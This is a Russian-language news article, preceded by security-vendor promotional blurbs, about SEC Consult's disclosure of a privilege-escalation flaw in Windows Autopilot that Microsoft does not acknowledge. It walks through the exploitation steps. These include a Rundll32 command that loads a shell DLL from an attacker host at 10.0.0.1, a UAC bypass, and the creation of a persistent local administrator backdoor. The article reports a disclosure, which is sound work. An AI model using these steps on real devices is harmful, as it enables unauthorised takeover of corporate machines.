Как организовать безопасный удаленный доступ для любого числа сотрудников?

- КиТ :: Будь в СЕТИ!

В нынешней ситуации бизнес должен принимать во внимание, что киберпреступники готовы использовать слабые места и пробелы в безопасности, которые возникают из-за стремительного перехода сотрудников компании на новый формат работы. Неподготовленные пользователи и незащищенные системы могут быстро стать проводниками вредоносных программ. Время имеет существенное значение, а потому безопасность должна быть неотъемлемым элементом любой стратегии удаленной работы.

ак подготовить ИБ-департаменты компании к форс-мажорам? Какие решения помогут удаленно работать сотрудникам вне офиса? Можно ли гарантированно обезопасить предприятие от потери данных? Читайте электронную книгу о правилах обеспечения непрерывности бизнеса и смотрите вебинар о том, как организовать удаленную работу сотрудников. Посмотреть вебинар × Как защитить данные в ЦОДах от новых типов атак?

Компании повышают гибкость ключевых рабочих процессов с помощью гибридных инфраструктур. Колокация и облака хорошо влияют на оперативность бизнеса, но защищать ИТ-среды при таком подходе стало куда сложнее. Стратегия четырех из пяти предприятий в этом направлении - провальна, а простои из-за действий киберпреступников в двухлетний период оборачиваются средним ущербом в $67,2 млн.

Можно ли интегрировать ИБ-решения во все части гибридной инфраструктуры? Как автоматизировать защиту и сделать ее более интеллектуальной? Какова доля вредоносного ПО в зашифрованном трафике и что с этим могут сделать межсетевые экраны NGFW? Зарегистрируйтесь, чтобы бесплатно скачать электронную книгу о методах защиты распределенных гибридных ЦОДов прямо сейчас. --> × Как настроить межсетевое экранирование и не запутаться в обещаниях вендоров?

Разработчики архитектур безопасности должны обеспечивать комплексную защиту корпоративных сетей. Но обилие предложений на рынке и скрытность отдельных вендоров создает серьезные проблемы для бизнеса.

как получить полные сведения о показателях производительности решений? почему межсетевые экраны стали основой корпоративной безопасности? как выбрать действительно подходящее решение и не пожалеть о выборе через несколько месяцев? Зарегистрируйтесь, чтобы скачать брошюру о том, какими должны быть характеристики действительно современного межсетевого экранирования. × Что должен уметь искусственный интеллект в SOC?

74% специалистов в области ИБ признаются, что нехватка квалифицированных кадров отрицательно сказывается на их организациях. Эту проблему можно решить при помощи виртуального аналитика SOC на базе глубинных нейросетей, который берет на себя рутинные операции и помогает живым специалистам в решении более сложных задач.

можно ли оставлять без присмотра ИИ-системы, если на карту поставлена безопасность компании? как научить искусственный интеллект взаимодействовать с остальным персоналом организации? можно ли выявлять угрозы ИБ меньше, чем за 1 секунду? Зарегистрируйтесь, чтобы скачать брошюру о том, как настроить виртуального аналитика SOC и научить его работать за вас. В Windows нашли «дыру» для захвата ПК ПО Безопасность Техника 02.12.2020, Ср, 08:28, Мск , Текст: Роман Георгиев

Эксперты SEC Consult описали возможность создания бэкдоров с помощью инструмента Microsoft для развертывания новых устройств в корпоративной сети. В Microsoft утверждают, что проблемы не существует.

Бэкдоры на автопилоте

Австрийская компания SEC Consult сообщила об обнаружении уязвимости, допускающей повышение привилегий, в Microsoft Autopilot, инструменте для развертывания устройств в корпоративных сетях. В Microsoft пока заявляют, что багом выявленная проблема не является. В SEC Consult с этим не согласились и опубликовали технические подробности.

Windows Autopilot — это совокупность технологий, используемых для настройки и предварительной конфигурации новых устройств в корпоративной сети с установкой OEM-оптимизированной версии Windows 10, которая затем может быть преобразована в другие варианты ОС — «профессиональную» или «корпоративную». Autopilot также применяется для снятия устройств с учета, сброса настроек, переназначения или восстановления устройств.

Эксперты SEC Consult обнаружили критический, по их мнению, изъян, затрагивающий процесс развертывания Autopilot, который позволяет злоумышленнику или обычному пользователю повышать свои привилегии до уровня локального администратора.

В Windows Autopilot найдена критическая уязвимость, которую Microsoft не признает

Это возможно даже если в профиле развертывания Autopilot специально указано, что новые пользователи могут добавляться только в группу обычных непривилегированных юзеров, что добавление новых локальных администраторов запрещено и что запуск CMD через Shift+F10 в интерфейсе OOBE запрещен однозначно.

Проблема присутствует минимум в двух сценариях Windows Autopilot — User-Driven (управляемый пользователем) и pre-provisioning (предварительно подготовленное развертывание).

Не исключено, что проблема может эксплуатироваться и в других сценариях.

Создать ошибку

Эксплуатация уязвимости предполагает искусственный вызов ошибки на устройстве, на которое накатывается ПО с помощью WindowsAutopilot: либо посредством отключения от локальной сети, либо с помощью деактивации устройства безопасности TPM. Ошибка также возникнет, если версия TPM ниже 2.0.

При открытии окна с сообщением об ошибке потребуется кликнуть на кнопку ViewDiagnostics (просмотр диагностики), затем в диалоге «выбор папки» нужно ввести Rundll32.exe\\10.0.0.1\shell.dll,DLLMain. Этим устанавливается соединение шелла с хостом атакующего в качестве пользователя по умолчанию — defaultuser0. У этого юзера — администраторские полномочия.

Поскольку система UAC активна, потребуется инструмент его обхода - эксперты SECConsult применили StoreFileSys. В итоге злоумышленник получает возможность создать локального пользователя с администраторскими полномочиями или другие бэкдоры. Дальше остается только присоединить устройство обратно к локальной сети или снова активировать TPM.

Накатывание ПО возобновляется и проходит успешно от начала и до конца. Пользователь defaultuser0 устраняется, однако созданные им локальные пользователи с административными полномочиями сохраняются.

Естественно, эксперты SECConsult немедленно проинформировали о проблеме Microsoft через сервис msrc.microsoft.com, приложив к сообщению тестовый эксплойт. Однако разработчик Windows сперва проигнорировал сообщение, а затем заявил, что проблема отсутствует и что угрозы безопасности не выявлено. После этого в SECConsult решили опубликовать технические сведения об уязвимости.

«Речь, вероятнее всего, об ошибке: игнорировать такую уязвимость и, тем более, рассматривать ее как “нормальное поведение”, как минимум, недальновидно, — полагает Михаил Зайцев, эксперт по информационной безопасности компании SEC Consult Services, российского дочернего предприятия SEC Consult. — Угроза выглядит достаточно серьезной, так что после публикации сведений о ней Microsoft, скорее всего, придется с большим вниманием подойти к вопросу».

ПодпискаБудь в СЕТИ! Новости социальных сетей - всегда актуальное
 
Группы: ВК | OK | Tg